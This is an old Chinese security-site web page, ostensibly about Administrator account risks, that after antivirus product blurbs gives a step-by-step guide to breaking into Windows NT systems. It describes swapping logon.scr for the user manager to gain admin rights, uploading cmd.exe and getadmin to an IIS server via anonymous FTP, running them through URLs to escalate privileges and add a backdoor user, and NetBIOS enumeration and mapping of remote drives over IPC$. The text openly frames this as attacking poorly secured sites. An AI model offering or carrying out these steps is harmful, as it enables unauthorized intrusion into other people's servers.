首 页健康生活新 闻留 言骗 子美女图片网络安全论 坛问吧注册码大全bt资源
张筱雨人体艺术   汤芳人体艺术  汤加丽人体艺术  石靖人体艺术   刘亦菲人体艺术   汤唯人体艺术  张柏芝人体艺术   人体艺术摄影
网络安全知识        Knowledge of network security
                                           Small knowledge of computer security,Computer knowledge
首页
您当前的位置:地球村网络安全安全防范 → 新频道内容 设为首页   加入收藏   联系我们
Administrastor账户真的不安全 Administrastor accounts really unsafe

作者:admin  来源:本站原创  发布时间:2007-10-12 9:09:41
瑞星杀毒软件2008版,是基于新一代虚拟机脱壳引擎、采用三层主动防御策略开发的新一代信息安全产品。
瑞星08独创的“帐号保险柜”基于“主动防御”构架开发,可保护上百种流行软件的帐号,包括70 多款热门网游,30多种股票、网上银行类软件,QQ 、MSN等常用聊天工具及下载软件等。
同时,瑞星08采用"木马强杀"、"病毒DNA 识别"、"主动防御"、"恶意行为检测"等大量核心技术,
《Windows木马清道夫》是一款专门查杀并可辅助查杀木马的专业级反木马信息安全产品,是全新一代的木马克星!《Windows木马清道夫》可自动查杀数十万种木马,拥有海量木马病毒库,配合手动分析可近100%对未知木马进行查杀!它不仅可以查木马,还可以分析出后门程序,黑客程序等等。它专业的分析功能,完美的升级功能,使您不再惧怕木马,让您远离木马的困扰
卡巴斯基单机版(Kaspersky Anti-Virus Personal)是俄罗斯著名数据安全厂商Kaspersky Labs专为我国个人用户度身定制的反病毒产品。这款产品功能包括:病毒扫描、驻留后台的病毒防护程序、脚本病毒拦截器以及邮件检测程序,时刻监控一切病毒可能入侵的途径。产品采用第二代启发式代码分析技术、iChecker实时监控技术和独特的脚本病毒拦截技术等多种最尖端的反病毒技术

       如果你有普通用户帐号,有个一个很简单的方法获取NT Administrator帐号:   

  先把c:\winnt\system32下的logon.scr改名为logon.old备份   

  然后把usrmgr.exe改名为logon.scr   

  然后重新启动   

  logon.scr是启动时加载的程序,重新启动后,不会出现以往的登陆密码输入界面,而是用户管理器。   

  这时他就有权限把自己加到Administrator组   

  不要忘记把文件名改回来啊!   

  之二:   

  下面的技术适用于不重视NT网络安全的网站, 一些 http的技术也可以供较高级的人员参考

  进入NT网络可以采取下面的步骤:   

  因为NT的IIS server的ftp一般都是允许anonymous匿名帐号进入的,有些anonymous的帐号还有upload权限,我们就要攻击这类站点。因为如果不允许匿名帐号,就可能造成明文密码在网上传输。用tcpspy的工具可以截获这些密码。现在不谈这些比较高级的技术。  
  正因为允许匿名帐号ftp登陆的设定,也给我们带来了突破NT server的机会。我们用ftp登陆一个NT server,比如:www.xxx.com(示例名):   

  ftp www.xxx.com   

  Connected to www.xxx.com

  ntsvr2这个东西暴露了其NETbios名,那么在IIS的背景下,必然会有一个IUSER_ntsvr2的用户帐号,属于Domain user组,这个帐号我们以后要用来获取Administrator的权限。   
  User (www.xxx.comnone)):anonymous   

  Password: 输入 guest@ 或者guest   

  对于缺乏网络安全知识的管理员来说,很多人没有将guest帐号禁止,或者没有设置密码。那么guest帐号就是一个可用的正确的用户帐号,虽然只属于Domain guest组。   

  在这种情况下我们就可以进NT server的ftp了。  

  进去以后,看看目录列表,试试 cd /c 或wwwroot等关键目录,如果运气好,改变目录成功,这时你就有了80%的把握。   

  现在,开始查找cgi-bin目录(或者scripts目录),进去以后,  

  把winnt下的cmd.execopy到cgi-bin,把getadmin和gasys.dll传上去到cgi-bin   

  然后输入:http://www.xxx.com/cgi-bin/getadmin.exe?IUSR_SATURN 

  大约十多秒后屏幕显示:

  CGI Error

  这时有90%的可能是:你已经把IUSER_ntsvr2升级为Administrator,也就是任何访问该web站的人都是管理员。   

  下面可以add user:   

  http://www.xxx.com/cgi-bin/cmd.exe?/c c:\winnt\system32\net.exe user china news /add

  这样就创建了一个叫china用户,密码是news,然后:   

  http://www.xxx.com/cgi-bin/getadmin.exe?china

  或者

  http://www.xxx.com/scripts/tools/getadmin.exe?china   

  你再用china的帐号登陆,就可以有最大的权限了,也可以用上面的cmd.exe的方法直接修改如果没有cmd.exe,也可以自己传一个上去到scripts/tools或者cgi-bin目录。

  之三:   

  用NT的Netbios技术扫描  

  nbtstat -a http://www.xxx.com/

  或者   

  nbtstat -A http://www.xxx.com/   

  这样可以得到其域的共享资源名称   

  net view file://www.xxx.com/   

  可以获得其机器的共享资源名称,如果有c盘

  net use f: file://www.xxx.com/c   

  可以用f:映射其c盘

  net use $">\\111.111.111.111\ipc$Content$nbsp;"quot;"quot; /user:"quot;"quot;

  之四: Unix下移植过来的工具:  

  Windows95"amp;98的用户可以用这个tcp/ip工具去抓tcp/ip连接中的包:   

  WinDump95.exe 使用前还要下载这个库 Packet95.exe   

  WindowsNT用户的版本

  WinDump.exe PacketNT.exe

[ ] [返回上一页] [打 印]
Copyright © 2007 Diqiuc.Com. All Rights Reserved .豫ICP备07001840 Powered by Diqiuc.Com